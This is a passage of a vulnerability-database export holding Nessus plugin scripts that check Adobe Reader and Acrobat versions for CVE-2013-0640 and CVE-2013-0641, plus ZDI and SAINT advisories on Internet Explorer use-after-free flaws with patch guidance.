on:\n&#9;http://www.adobe.com/support/security/bulletins/apsb13-07.html\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb13-07.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb13-07.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=803939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-02/msg00068.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-02/msg00085.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-browser-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1|SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1 / 12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"acroread-9.5.4-3.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"acroread-browser-plugin-9.5.4-3.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"acroread-cmaps-9.4.1-3.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"acroread-fonts-ja-9.4.1-3.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"acroread-fonts-ko-9.4.1-3.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"acroread-fonts-zh_CN-9.4.1-3.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"acroread-fonts-zh_TW-9.4.1-3.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-9.5.4-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-browser-plugin-9.5.4-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-cmaps-9.4.1-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-fonts-ja-9.4.1-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-fonts-ko-9.4.1-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-fonts-zh_CN-9.4.1-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-fonts-zh_TW-9.4.1-3.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-01T00:30:56", "bulletinFamily": "scanner", "description": "The version of Adobe Reader installed on the remote Mac OS X host is\nprior to 11.0.2, 10.1.6, or 9.5.4. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - An unspecified memory corruption issue exists that\n allows a remote attacker to cause a denial of service or\n execute arbitrary code via a crafted PDF document.\n (CVE-2013-0640)\n\n - An unspecified buffer overflow condition exists that\n allows a remote attacker to execute arbitrary code via\n a crafted PDF document. (CVE-2013-0641)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "modified": "2020-02-02T00:00:00", "id": "MACOSX_ADOBE_READER_APSB13-07.NASL", "href": "https://www.tenable.com/plugins/nessus/64787", "published": "2013-02-21T00:00:00", "title": "Adobe Reader < 11.0.2 / 10.1.6 / 9.5.4 Multiple Vulnerabilities (APSA13-02, APSB13-07) (Mac OS X)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64787);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2013-0640\",\n \"CVE-2013-0641\"\n );\n script_bugtraq_id(\n 57931,\n 57947\n );\n script_xref(name:\"CERT\", value:\"422807\");\n script_xref(name:\"EDB-ID\", value:\"29881\");\n\n script_name(english:\"Adobe Reader < 11.0.2 / 10.1.6 / 9.5.4 Multiple Vulnerabilities (APSA13-02, APSB13-07) (Mac OS X)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader on the remote Mac OS X host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Mac OS X host is\nprior to 11.0.2, 10.1.6, or 9.5.4. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - An unspecified memory corruption issue exists that\n allows a remote attacker to cause a denial of service or\n execute arbitrary code via a crafted PDF document.\n (CVE-2013-0640)\n\n - An unspecified buffer overflow condition exists that\n allows a remote attacker to execute arbitrary code via\n a crafted PDF document. (CVE-2013-0641)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/advisories/apsa13-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-07.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 11.0.2 / 10.1.6 / 9.5.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\"))\n audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (!get_kb_item(\"Host/MacOSX/Version\"))\n audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp = \"Adobe Reader\";\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\nversion = install['version'];\npath = install['path'];\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] < 4)\n)\n fix = \"9.5.4\";\nelse if (\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] < 6)\n)\n fix = \"10.1.6\";\nelse if (ver[0] == 11 && ver[1] == 0 && ver[2] < 2)\n fix = \"11.0.2\";\nelse\n fix = \"\";\n\nif (fix)\n{\n info =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:info, severity:SECURITY_HOLE);\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-01T06:39:29", "bulletinFamily": "scanner", "description": "The version of Adobe Acrobat installed on the remote host is earlier\nthan 11.0.2 / 10.1.6 / 9.5.4. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An unspecified memory corruption error exists that\n could lead to code execution. (CVE-2013-0640)\n\n - An unspecified buffer overflow error exists that could\n lead to code execution. (CVE-2013-0641)", "modified": "2020-02-02T00:00:00", "id": "ADOBE_ACROBAT_APSB13-07.NASL", "href": "https://www.tenable.com/plugins/nessus/64785", "published": "2013-02-21T00:00:00", "title": "Adobe Acrobat < 11.0.2 / 10.1.6 / 9.5.4 Multiple Vulnerabilities (APSB13-07)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64785);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2013-0640\", \"CVE-2013-0641\");\n script_bugtraq_id(57931, 57947);\n script_xref(name:\"CERT\", value:\"422807\");\n script_xref(name:\"EDB-ID\", value:\"29881\");\n\n script_name(english:\"Adobe Acrobat < 11.0.2 / 10.1.6 / 9.5.4 Multiple Vulnerabilities (APSB13-07)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_set_attribute(attribute:\"synopsis\",value:\n\"The version of Adobe Acrobat on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Acrobat installed on the remote host is earlier\nthan 11.0.2 / 10.1.6 / 9.5.4. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An unspecified memory corruption error exists that\n could lead to code execution. (CVE-2013-0640)\n\n - An unspecified buffer overflow error exists that could\n lead to code execution. (CVE-2013-0641)\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Acrobat 11.0.2 / 10.1.6 / 9.5.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/advisories/apsa13-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-07.html\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Acrobat/Version\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Acrobat/Version\");\nversion_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\npath = get_kb_item_or_exit('SMB/Acrobat/Path');\n\nif (\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] < 4) ||\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] < 6) ||\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 2)\n)\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n Fixed version : 11.0.2 / 10.1.6 / 9.5.4\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe Acrobat\", version_report, path);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2016-11-09T00:18:15", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the CCommand::Exec function. It is possible to free certain objects in a callback function called from the CCommand::Exec function. Upon return from this function a local variable is being re-used without check. This can lead to a use-after-free issue that can result in remote code execution under the context of the current process.", "modified": "2012-11-09T00:00:00", "published": "2012-12-21T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-12-199", "id": "ZDI-12-199", "title": "Microsoft Internet Explorer execCommand Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "description": "Added: 09/19/2012 \nCVE: [CVE-2012-4969](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4969>) \nBID: [55562](<http://www.securityfocus.com/bid/55562>) \nOSVDB: [85532](<http://www.osvdb.org/85532>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer does not properly clean up references to objects passed to the execCommand Javascript method. If execCommand is called by an object's event handler and the execCommand parameter modifies the DOM such that the parent object is modified, the parent is freed and reallocated, but references to the parent are not redirected. This can cause a use-after-free condition, which may be exploitable when combined with a heap spray. \n\n### Resolution\n\nApply the patch detailed in [Microsoft Security Bulletin MS12-063](<http://technet.microsoft.com/en-us/security/bulletin/ms12-063>). \nAlternatively, installing the Microsoft Exploit Mitigation Experience Toolkit prevents this vulnerability from being exploited, and also improves overall security of your Windows system. To install and configure Microsoft Exploit Mitigation Experience Toolkit, following the instructions in [Microsoft Security Advisory 2757760](<http://technet.microsoft.com/en-us/security/advisory/2757760>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-063> \n<http://technet.microsoft.com/en-us/security/advisory/2757760> \n<http://www.microsoft.com/en-us/download/details.aspx?id=29851> \n<http://nakedsecurity.sophos.com/2012/09/18/microsoft-advisory-internet-explorer-zero-day-affects-most-windows-versions/> \n<http://threatpost.com/en_us/blogs/latest-ie-zero-day-flaw-tied-nitro-hackers-and-recent-java-zero-day-exploits-091712> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 and 9 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-09-19T00:00:00", "published": "2012-09-19T00:00:00", "id": "SAINT:D9A07373E169F8C48267AC930C4D49AB", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_cmshtmled_exec_uaf", "type": "saint", "title": "Internet Explorer CMshtmlEd execCommand Use After Free", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:24", "bulletinFamily": "exploit", "description": "Added: 09/19/2012 \nCVE: [CVE-2012-4969](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4969>) \nBID: [55562](<http://www.securityfocus.com/bid/55562>) \nOSVDB: [85532](<http://www.osvdb.org/85532>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer does not properly clean up references to objects passed to the execCommand Javascript method. If execCommand is called by an object's event handler and the execCommand parameter modifies the DOM such that the parent object is modified, the parent is freed and reallocated, but references to the parent are not redirected. This can cause a use-after-free condition, which may be exploitable when combined with a heap spray. \n\n### Resolution\n\nApply the patch detailed in [Microsoft Security Bulletin MS12-063](<http://technet.microsoft.com/en-us/security/bulletin/ms12-063>). \nAlternatively, installing the Microsoft Exploit Mitigation Experience Toolkit prevents this vulnerability from being exploited, and also improves overall security of your Windows system. To install and configure Microsoft Exploit Mitigation Experience Toolkit, following the instructions in [Microsoft Security Advisory 2757760](<http://technet.microsoft.com/en-us/security/advisory/2757760>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-063> \n<http://technet.microsoft.com/en-us/security/advisory/2757760> \n<http://www.microsoft.com/en-us/download/details.aspx?id=29851> \n<http://nakedsecurity.sophos.com/2012/09/18/microsoft-advisory-internet-explorer-zero-day-affects-most-windows-versions/> \n<http://threatpost.com/en_us/blogs/latest-ie-zero-day-flaw-tied-nitro-hackers-and-recent-java-zero-day-exploits-091712> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 and 9 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-09-19T00:00:00", "published": "2012-09-19T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_cmshtmled_exec_uaf", "id": "SAINT:C8A99119E3B66AE618442F25E6C3A18D", "type": "saint", "title": "Internet Explorer CMshtmlEd execCommand Use After Free", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "description": "Added: 09/25/2013 \nCVE: [CVE-2013-3893](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893>) \nBID: [62453](<http://www.securityfocus.com/bid/62453>) \nOSVDB: [97380](<http://www.osvdb.org/97380>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 6 through 11 contain a use-after-free vulnerability in the SetMouseCapture implementation in the HTML rendering engine (`**mshtml.dll**`). The vulnerability is triggered by the OnLoseCapture event. A remote attacker that persuades a user to open a specially crafted web page in a vulnerable version of IE could dereference already freed memory and execute arbitrary code via crafted JavaScript strings. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2887505](<http://technet.microsoft.com/en-us/security/advisory/2887505>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx> \n<http://secunia.com/advisories/54884/> \n\n\n### Limitations\n\nExploit works on Microsoft Internet Explorer 8 and 9 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). JRE 6 must be installed on Windows 7. \n\nThe user must open the exploit in a vulnerable version of Internet Explorer. The chance of successful exploitation is very low against Internet Explorer 8 on Windows 7. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-09-25T00:00:00", "published": "2013-09-25T00:00:00", "id": "SAINT:04BD9122E7584A49B7BA167BCE00F13E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_onlosecapture_event_uaf", "type": "saint", "title": "Internet Explorer HTML Rendering Engine onLoseCapture Use-After-Free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:29", "bulletinFamily": "exploit", "description": "Added: 09/25/2013 \nCVE: [CVE-2013-3893](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893>) \nBID: [62453](<http://www.securityfocus.com/bid/62453>) \nOSVDB: [97380](<http://www.osvdb.org/97380>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 6 through 11 contain a use-after-free vulnerability in the SetMouseCapture implementation in the HTML rendering engine (`**mshtml.dll**`). The vulnerability is triggered by the OnLoseCapture event. A remote attacker that persuades a user to open a specially crafted web page in a vulnerable version of IE could dereference already freed memory and execute arbitrary code via crafted JavaScript strings. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2887505](<http://technet.microsoft.com/en-us/security/advisory/2887505>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx> \n<http://secunia.com/advisories/54884/> \n\n\n### Limitations\n\nExploit works on Microsoft Internet Explorer 8 and 9 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). JRE 6 must be installed on Windows 7. \n\nThe user must open the exploit in a vulnerable version of Internet Explorer. The chance of successful exploitation is very low against Internet Explorer 8 on Windows 7. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-09-25T00:00:00", "published": "2013-09-25T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_onlosecapture_event_uaf", "id": "SAINT:A85CFBC6927213488530ECDD18E63DF7", "type": "saint", "title": "Internet Explorer HTML Rendering Engine onLoseCapture Use-After-Free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "description": "Added: 09/25/2013 \nCVE: [CVE-2013-3893](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893>) \nBID: [62453](<http://www.securityfocus.com/bid/62453>) \nOSVDB: [97380](<http://www.osvdb.org/97380>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 6 through 11 contain a use-after-free vulnerability in the SetMouseCapture implementation in the HTML rendering engine (`**mshtml.dll**`). The vulnerability is triggered by the OnLoseCapture event. A remote attacker that persuades a user to open a specially crafted web page in a vulnerable version of IE could dereference already freed memory and execute arbitrary code via crafted JavaScript strings. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2887505](<http://technet.microsoft.com/en-us/security/advisory/2887505>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx> \n<http://secunia.com/advisories/54884/> \n\n\n### Limitations\n\nExploit works on Microsoft Internet Explorer 8 and 9 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). JRE 6 must be installed on Windows 7. \n\nThe user must open the exploit in a vulnerable version of Internet Explorer. The chance of successful exploitation is very low against Internet Explorer 8 on Windows 7. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-09-25T00:00:00", "published": "2013-09-25T00:00:00", "id": "SAINT:AA6CF686B616406A4115C9EBD9C6048C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_onlosecapture_event_uaf", "title": "Internet Explorer HTML Rendering Engine onLoseCapture Use-After-Free Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "description": "Added: 09/19/2012 \nCVE: [CVE-2012-4969](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4969>) \nBID: [55562](<http://www.securityfocus.com/bid/55562>) \nOSVDB: [85532](<http://www.osvdb.org/85532>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer does not properly clean up references to objects passed to the execCommand Javascript method. If execCommand is called by an object's event handler and the execCommand parameter modifies the DOM such that the parent object is modified, the parent is freed and reallocated, but references to the parent are not redirected. This can cause a use-after-free condition, which may be exploitable when combined with a heap spray. \n\n### Resolution\n\nApply the patch detailed in [Microsoft Security Bulletin MS12-063](<http://technet.microsoft.com/en-us/security/bulletin/ms12-063>). \nAlternatively, installing the Microsoft Exploit Mitigation Experience Toolkit prevents this vulnerability from being exploited, and also improves overall security of your Windows system. To install and configure Microsoft Exploit Mitigation Experience Toolkit, following the instructions in [Microsoft Security Advisory 2757760](<http://technet.microsoft.com/en-us/security/advisory/2757760>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-063> \n<http://technet.microsoft.com/en-us/security/advisory/2757760> \n<http://www.microsoft.com/en-us/download/details.aspx?id=29851> \n<http://nakedsecurity.sophos.com/2012/09/18/microsoft-advisory-internet-explorer-zero-day-affects-most-windows-versions/> \n<http://threatpost.com/en_us/blogs/latest-ie-zero-day-flaw-tied-nitro-hackers-and-recent-java-zero-day-exploits-091712> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 and 9 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-09-19T00:00:00", "published": "2012-09-19T00:00:00", "id": "SAINT:AE7EA3E507E47C6D0227B892372736BE", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_cmshtmled_exec_uaf", "title": "Internet Explorer CMshtmlEd execCommand Use After Free", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:30", "bulletinFamily": "exploit", "description": "Added: 01/04/2013 \nCVE: [CVE-2012-4792](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) \nBID: [57070](<http://www.securityfocus.com/bid/57070>) \nOSVDB: [88774](<http://www.osvdb.org/88774>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nAll references to DOM button objects are not properly removed when a DOM buttom object is deleted. If the stale references are used, an attempt to access unallocated memory may occur. This results in a use-after-free vulnerability. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft Security Bulletin [MS13-008](<http://technet.microsoft.com/en-us/security/Bulletin/MS13-008>). \n\n### 